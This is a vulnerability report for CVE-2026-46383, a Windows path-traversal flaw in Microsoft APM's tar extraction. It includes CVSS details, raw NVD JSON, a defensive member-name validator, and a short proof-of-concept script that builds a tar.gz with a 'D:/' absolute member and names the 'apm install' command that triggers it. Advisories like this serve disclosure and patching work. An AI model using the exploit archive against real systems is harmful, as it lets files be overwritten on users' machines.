Security Vulnerability Report

CVE-2026-46383 (CVSS 5.5, MEDIUM)

Published: 2026-05-15 17:16:49
Last Modified: 2026-05-15 19:17:04

Description

Microsoft APM is an open-source, community-driven dependency manager for AI agents. Prior to 0.13.0, Microsoft APM contains a Windows-specific archive extraction boundary failure in the legacy-bundle probe used by apm install <bundle> on supported Python 3.10 and 3.11 runtimes. When apm install is given a local .tar.gz that is not recognized as a plugin-format bundle, APM probes whether it is a legacy --format apm bundle. On Python versions earlier than 3.12, that probe extracts untrusted tar members with raw tar.extractall() without rejecting Windows absolute member names such as D:/.... This vulnerability is fixed in 0.13.0.
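The pre-extraction check that the description above says the pre-3.12 legacy-bundle probe lacks, as an added example (not APM's own code): every member name is validated before tar.extractall() is called, rejecting Windows drive-letter and UNC names alongside POSIX-absolute and '..' names, so the protection does not depend on tarfile extraction filters being available on the runtime. Function names and the archive contents are constructed for this example.

```python
import io
import posixpath
import tarfile
from pathlib import PureWindowsPath

def is_unsafe_member_name(name: str) -> bool:
    """True if a member name could resolve outside the extraction root: POSIX
    absolute, Windows drive-letter/UNC (D:/x, //srv/share/x, which os.path.isabs()
    misses on POSIX), or any '..' component left after normalisation."""
    if not name:
        return True
    if name.startswith(("/", "\\")) or PureWindowsPath(name).drive:
        return True
    parts = posixpath.normpath(name.replace("\\", "/")).split("/")
    return ".." in parts

def check_tar_members(tar: tarfile.TarFile) -> list[str]:
    """Names of members that must not be extracted (link targets are checked too)."""
    bad = []
    for m in tar.getmembers():
        if is_unsafe_member_name(m.name):
            bad.append(m.name)
        elif (m.issym() or m.islnk()) and is_unsafe_member_name(m.linkname):
            bad.append(m.name)  # conservative: any absolute or climbing link target is rejected
    return bad

def unsafe_members(archive: bytes) -> list[str]:
    """Run the check over an in-memory .tar.gz and report offending member names."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        return check_tar_members(tar)

def safe_extractall(archive: bytes, dest: str) -> None:
    """Refuse the whole archive if any member fails; extract only when all pass."""
    bad = unsafe_members(archive)
    if bad:
        raise ValueError(f"refusing archive with unsafe member names: {bad}")
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        tar.extractall(dest)

def build_archive(members: dict[str, bytes]) -> bytes:
    """Build a small .tar.gz in memory from constructed sample members (hypothetical content)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()
```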

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

Microsoft APM < 0.13.0 (no formal configuration data available)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import tarfile
import io

# PoC for CVE-2026-46383: Path Traversal via tar extraction
# This script creates a malicious tar.gz file containing a file with an absolute path.

def create_exploit_tar(output_file):
    data = b"This is a malicious payload that overwrites a system file."
    with tarfile.open(output_file, "w:gz") as tar:
        # Create a TarInfo object for the malicious file
        info = tarfile.TarInfo(name="D:/exploit_test.txt")
        info.size = len(data)
        # Add the file with absolute path to the archive
        tar.addfile(info, io.BytesIO(data))
    print(f"[+] Exploit archive created: {output_file}")
    print(f"[+] Run 'apm install {output_file}' on a vulnerable system to trigger.")

if __name__ == "__main__":
    create_exploit_tar("malicious_bundle.tar.gz")

References

GitHub Security Advisory GHSA-mq5j-pw29-jcv3: https://github.com/microsoft/apm/security/advisories/GHSA-mq5j-pw29-jcv3

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-46383",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T17:16:49.090",
    "lastModified": "2026-05-15T19:17:04.220",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Microsoft APM is an open-source, community-driven dependency manager for AI agents. Prior to 0.13.0, Microsoft APM contains a Windows-specific archive extraction boundary failure in the legacy-bundle probe used by apm install <bundle> on supported Python 3.10 and 3.11 runtimes. When apm install is given a local .tar.gz that is not recognized as a plugin-format bundle, APM probes whether it is a legacy --format apm bundle. On Python versions earlier than 3.12, that probe extracts untrusted tar members with raw tar.extractall() without rejecting Windows absolute member names such as D:/.... This vulnerability is fixed in 0.13.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-22"},
          {"lang": "en", "value": "CWE-73"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/microsoft/apm/security/advisories/GHSA-mq5j-pw29-jcv3",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/microsoft/apm/security/advisories/GHSA-mq5j-pw29-jcv3",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}